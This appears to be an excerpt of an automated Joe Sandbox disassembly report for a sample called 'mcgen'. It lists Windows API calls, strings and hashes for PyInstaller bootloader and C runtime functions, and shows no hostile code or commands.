K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF6B9F19216), ref: 00007FF6B9F185E9

Part of subcall function 00007FF6B9F19400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6B9F145E4,00000000,00007FF6B9F11985), ref: 00007FF6B9F19439

K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6B9F19216), ref: 00007FF6B9F18678
K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6B9F19216), ref: 00007FF6B9F186E4
FreeLibrary.KERNEL32(?,?,00000000,00007FF6B9F19216), ref: 00007FF6B9F186F5
FreeLibrary.KERNEL32(?,?,00000000,00007FF6B9F19216), ref: 00007FF6B9F1870A

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
Instruction ID: f7d0532b8a7a046eb6e68b1a78811d12a2034af74e13b223fd48407dc2950473
Opcode Fuzzy Hash: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
Instruction Fuzzy Hash: 0C41D8A2B196A242EA30DF1AA5406BA6398FF85BE6F440135DF9DD7B89DF3CD401C740

Function 00007FF6B9F2B338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6B9F24F81,?,?,?,?,00007FF6B9F2A4FA,?,?,?,?,00007FF6B9F271FF), ref: 00007FF6B9F2B347
FlsSetValue.KERNEL32(?,?,?,00007FF6B9F24F81,?,?,?,?,00007FF6B9F2A4FA,?,?,?,?,00007FF6B9F271FF), ref: 00007FF6B9F2B37D
FlsSetValue.KERNEL32(?,?,?,00007FF6B9F24F81,?,?,?,?,00007FF6B9F2A4FA,?,?,?,?,00007FF6B9F271FF), ref: 00007FF6B9F2B3AA
FlsSetValue.KERNEL32(?,?,?,00007FF6B9F24F81,?,?,?,?,00007FF6B9F2A4FA,?,?,?,?,00007FF6B9F271FF), ref: 00007FF6B9F2B3BB
FlsSetValue.KERNEL32(?,?,?,00007FF6B9F24F81,?,?,?,?,00007FF6B9F2A4FA,?,?,?,?,00007FF6B9F271FF), ref: 00007FF6B9F2B3CC
SetLastError.KERNEL32(?,?,?,00007FF6B9F24F81,?,?,?,?,00007FF6B9F2A4FA,?,?,?,?,00007FF6B9F271FF), ref: 00007FF6B9F2B3E7

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
Instruction ID: 4c5ce0847bf34fa6bb83aa4bd2d5a0be381ca7898600b267cfe4230e49de134b
Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
Instruction Fuzzy Hash: 67112920A0C68282FA54AF79565123D714A9F857F3F244739FE2EC77D6DE3CA8018701

Function 00007FF6B9F12910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6B9F11B6A), ref: 00007FF6B9F1295E

Strings

Error [ANSI Fallback], xrefs: 00007FF6B9F129FF
Error, xrefs: 00007FF6B9F12A0E
[PYI-%d:ERROR] , xrefs: 00007FF6B9F12966
%s: %s, xrefs: 00007FF6B9F129E8

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction ID: d7c672dfbc72c880207aa5923984d294bc80da227d93b1677f10017ea52a6a2a
Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction Fuzzy Hash: 27310462B1869142E7209B69A8402F67298BF897E6F400132FF8CC3795EF3CD146C340

Function 00007FF6B9F12390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6B9F123C8
DialogBoxIndirectParamW.USER32 ref: 00007FF6B9F1248E
DeleteObject.GDI32 ref: 00007FF6B9F124C1
DestroyIcon.USER32 ref: 00007FF6B9F124D3

Strings

Unhandled exception in script, xrefs: 00007FF6B9F123F8

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
Instruction ID: c2b4ee5128020f2e479a51bb448a96ee6a389f4cb2a1a6dd43dbfb19ddb80941
Opcode Fuzzy Hash: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
Instruction Fuzzy Hash: 84316A72A19A9289EB20EF69E8542F97368FF897A5F400135EB4D8BA59DF3CD1008701

Function 00007FF6B9F12B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6B9F1918F,?,00007FF6B9F13C55), ref: 00007FF6B9F12BA0
MessageBoxW.USER32 ref: 00007FF6B9F12C2A

Strings

WARNING, xrefs: 00007FF6B9F12BAF
Warning, xrefs: 00007FF6B9F12C1D
[PYI-%d:%ls] , xrefs: 00007FF6B9F12BA8

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction ID: 86542f4ff1da0bb9f3449de819b5a2bbc82df7417289ca79b2ff98e28abadfb4
Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction Fuzzy Hash: 4A21BC62B08B9182E7209F68F8807EA73A8EB887D5F400132EB8D93659DE3CD245C740

Function 00007FF6B9F12710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6B9F11B99), ref: 00007FF6B9F12760

Strings

Error [ANSI Fallback], xrefs: 00007FF6B9F127CF
ERROR, xrefs: 00007FF6B9F1276F
[PYI-%d:%s] , xrefs: 00007FF6B9F12768
Error, xrefs: 00007FF6B9F127DE

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction ID: ac74a519448d65734831d022d3416781cfbd48abb99fbc04aadad335d6106a2a
Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction Fuzzy Hash: F1217C72A18B9182E720DF69B8817E66398FB893E5F400136FB8C83659DF7CD2458740

Function 00007FF6B9F29AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6B9F29B1D
GetProcAddress.KERNEL32 ref: 00007FF6B9F29B33
FreeLibrary.KERNEL32 ref: 00007FF6B9F29B5A

Strings

mscoree.dll, xrefs: 00007FF6B9F29B14
CorExitProcess, xrefs: 00007FF6B9F29B2C

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction ID: 85f45718dfde5b5077e50aa88789ac5f0f1850b8e3552ee35928d5af45cb2c17
Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction Fuzzy Hash: 46F04F61A0960681EA208F38E4953796328EF457B3F540235DB6E872E5DF3CD1848700

Function 00007FF6B9F393D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6B9F39400
_set_statfp.LIBCMT ref: 00007FF6B9F3941B
_set_statfp.LIBCMT ref: 00007FF6B9F39437
_set_statfp.LIBCMT ref: 00007FF6B9F39473

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 4818a11069977892d93c0860187c08e32967ebcd252d8462a3469528ffc5afd7
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: F3114F62E5CA1381F674193CD45637A204CEF59376E248634EBBE876DBCE2CA9C54206

Function 00007FF6B9F2B400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6B9F2A613,?,?,00000000,00007FF6B9F2A8AE,?,?,?,?,?,00007FF6B9F2A83A), ref: 00007FF6B9F2B41F
FlsSetValue.KERNEL32(?,?,?,00007FF6B9F2A613,?,?,00000000,00007FF6B9F2A8AE,?,?,?,?,?,00007FF6B9F2A83A), ref: 00007FF6B9F2B43E
FlsSetValue.KERNEL32(?,?,?,00007FF6B9F2A613,?,?,00000000,00007FF6B9F2A8AE,?,?,?,?,?,00007FF6B9F2A83A), ref: 00007FF6B9F2B466
FlsSetValue.KERNEL32(?,?,?,00007FF6B9F2A613,?,?,00000000,00007FF6B9F2A8AE,?,?,?,?,?,00007FF6B9F2A83A), ref: 00007FF6B9F2B477
FlsSetValue.KERNEL32(?,?,?,00007FF6B9F2A613,?,?,00000000,00007FF6B9F2A8AE,?,?,?,?,?,00007FF6B9F2A83A), ref: 00007FF6B9F2B488

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
Instruction ID: 09851dd021e5df2ec27820b45a913893f70adacd54c2a0fef5b41d4a20dbb1e8
Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
Instruction Fuzzy Hash: B9114720A1C68241FA589F399691279714A9F857F2F688238FE3DCB6D6DE3CA4018700

Function 00007FF6B9F2B294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF6B9F2B2A5
FlsSetValue.KERNEL32 ref: 00007FF6B9F2B2C4
FlsSetValue.KERNEL32 ref: 00007FF6B9F2B2EC
FlsSetValue.KERNEL32 ref: 00007FF6B9F2B2FD
FlsSetValue.KERNEL32 ref: 00007FF6B9F2B30E

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
Instruction ID: 9d5508a47c5fff09b3fb3bc3a33e8ce37f03918262f81bc0e5bd34078010a21e
Opcode Fuzzy Hash: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
Instruction Fuzzy Hash: 2711F560E1928641FA58AA7D551177A314A8F463B3F644738FB3ECB2D2DD3CB8018301

Function 00007FF6B9F26010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F2604C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F26176
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F2622C

Strings

verbose, xrefs: 00007FF6B9F26020

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: 676f5fdc01aff1c2c648fd138c390e60bf20bae435dd7c3ca5caf5b2602e8c8d
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: C091CE32A09A8681FB618EA9D45037D3799AB44FA6F544137EB4EC73D5DF3CE8058301

Function 00007FF6B9F2FC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F2FF17

Part of subcall function 00007FF6B9F27AAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F27AC9

Strings

UTF-8, xrefs: 00007FF6B9F2FE96
UTF-16LEUNICODE, xrefs: 00007FF6B9F2FEB5
ccs, xrefs: 00007FF6B9F2FE52

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction ID: 752b652766ca628cf55fc8c209de54addd5a412e2ec68e6e4140d6756caed6df
Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction Fuzzy Hash: 8081D2B2D2868286F7654F2D811037837A8EB15776FB54134FB09DB299CF3DE9018701

Function 00007FF6B9F1D6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6B9F1D6E3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6B9F1D77A
RtlUnwindEx.KERNEL32 ref: 00007FF6B9F1D7D4

Strings

csm, xrefs: 00007FF6B9F1D761

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction ID: e24bdb4fe795ed19dac7d5be659a8ac28352457529105e15bf503db86026846f
Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction Fuzzy Hash: 4B51C272B196328ADB14DF19E044A3833A9EB45BBAF108135DB5E87784DF3CE851C750

Function 00007FF6B9F1F2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6B9F1F320
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF6B9F1F408

Strings

csm, xrefs: 00007FF6B9F1F45A
csm, xrefs: 00007FF6B9F1F342

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction ID: 9d423c6776c675cefd76ad71c53aa17281c2997cd3c102dcb903704983670cc2
Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction Fuzzy Hash: 5651B4B290837286EB648F29D04436877A8FB56BA6F244235DB4DC7795CF3CE851C781

Function 00007FF6B9F1EF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6B9F1EFA7
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6B9F1EFF3

Strings

RCC, xrefs: 00007FF6B9F1EFC3
MOC, xrefs: 00007FF6B9F1EFBB

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction ID: 0269334c8181439545edc37539dc67dbe6629749087c757f0e0f2d2ff981348c
Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction Fuzzy Hash: FB61C372908BE581E724CF19E4403AAB7A4FB86BE5F144225EB8C57B99CF7CD590CB40

Function 00007FF6B9F17E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF6B9F1352C,?,00000000,00007FF6B9F13F23), ref: 00007FF6B9F17F22

Strings

\, xrefs: 00007FF6B9F17E87
%.*s, xrefs: 00007FF6B9F17EDB
%s%c, xrefs: 00007FF6B9F17E94

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
